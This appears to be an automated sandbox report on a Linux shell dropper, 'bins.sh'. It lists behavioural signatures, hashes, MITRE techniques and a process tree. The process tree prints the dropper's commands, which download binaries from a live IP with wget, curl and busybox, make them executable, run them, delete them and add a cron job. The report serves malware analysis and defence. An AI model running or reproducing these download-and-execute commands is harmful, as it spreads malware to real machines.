Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 17:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
f69289a3ee777f64edc9fb46772eabe1
-
SHA1
83809727986e7f0783b2f52ef58c7f30e73d3d69
-
SHA256
eec33435e04ab331c98f21b0bd4941d5d1bc4644b8c338ca9c6d202811b20432
-
SHA512
de22ffb299e34fe41a6e403c46f028b287a1eb7ffd3cf438ae4e8a33ce3e98f6eab1104b41f49c966b3f740e888ccd1fdf8d93c3c7cea4338f3389c035e84836
-
SSDEEP
192:TLfOZ5azR+RyKhtEnLEnLEnkEnsQEnrEnMgI92ysQaEEnLEnLEnkEnsQEnrEn2g/:TLfOZ5azR+NU221CW7QaV221CWTJLfOu
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1907) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodpid Process 717 chmod 690 chmod 698 chmod -
Executes dropped EXE 3 IoCs
Processes:
rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6YtczVWka3o8UvvUPrq8vvbSKgmuslpFilShkqdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ranioc pid Process /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt 691 rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk 699 czVWka3o8UvvUPrq8vvbSKgmuslpFilShk /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran 718 qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran -
Renames itself 1 IoCs
Processes:
qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ranpid Process 719 qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.rg7tSx crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Rancurldescription ioc Process File opened for reading /proc/943/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1010/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/668/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/756/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/783/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/788/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/859/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/861/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/6/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/764/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/977/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/993/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1022/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/self/auxv curl File opened for reading /proc/863/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/906/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/984/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/996/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1001/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/14/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/771/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/784/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/656/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/882/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/814/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/901/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/916/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1035/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/964/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1033/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/650/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/746/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/797/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/813/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/892/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/955/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/144/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/761/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/933/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/773/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/777/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/897/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/945/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/769/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/20/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/27/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/873/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1006/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1015/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/5/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/9/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/828/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/853/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/937/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/1007/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/957/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/7/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/19/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/767/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/845/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/900/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/17/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran File opened for reading /proc/737/cmdline qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlwgetbusyboxcurlbusyboxbusyboxcurlwgetdescription ioc Process File opened for modification /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk wget File opened for modification /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk curl File opened for modification /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran wget File opened for modification /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran busybox File opened for modification /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt curl File opened for modification /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt busybox File opened for modification /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk busybox File opened for modification /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran curl File opened for modification /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:657
-
/bin/rm/bin/rm bins.sh2⤵PID:662
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Writes file to tmp directory
PID:666
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:677
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Writes file to tmp directory
PID:685
-
-
/bin/chmodchmod 777 rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt./rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Writes file to tmp directory
PID:697
-
-
/bin/chmodchmod 777 czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk./czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm czVWka3o8UvvUPrq8vvbSKgmuslpFilShk2⤵PID:701
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Writes file to tmp directory
PID:714
-
-
/bin/chmodchmod 777 qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran./qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:718 -
/bin/shsh -c "crontab -l"3⤵PID:720
-
/usr/bin/crontabcrontab -l4⤵PID:722
-
-
-
/bin/shsh -c "crontab -"3⤵PID:724
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:725
-
-
-
-
/bin/rmrm qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran2⤵PID:728
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵PID:732
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw2⤵PID:741
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
210B
MD5e915069d49b1fc5c4422792084164494
SHA13f65f016c89612b72db181b43d9427b94884aa64
SHA256a10e0144eaea83324789762771cc6f6dea40fb5354188fef437060cddc07db68
SHA512a9ada802154f53d2b4eb67b7e04bdfff4266bd6905ae7d542aca59931caf34084b639616f9b0a6425a89ab983c9c7b78e937a302f35e05a72eb04515bfd23107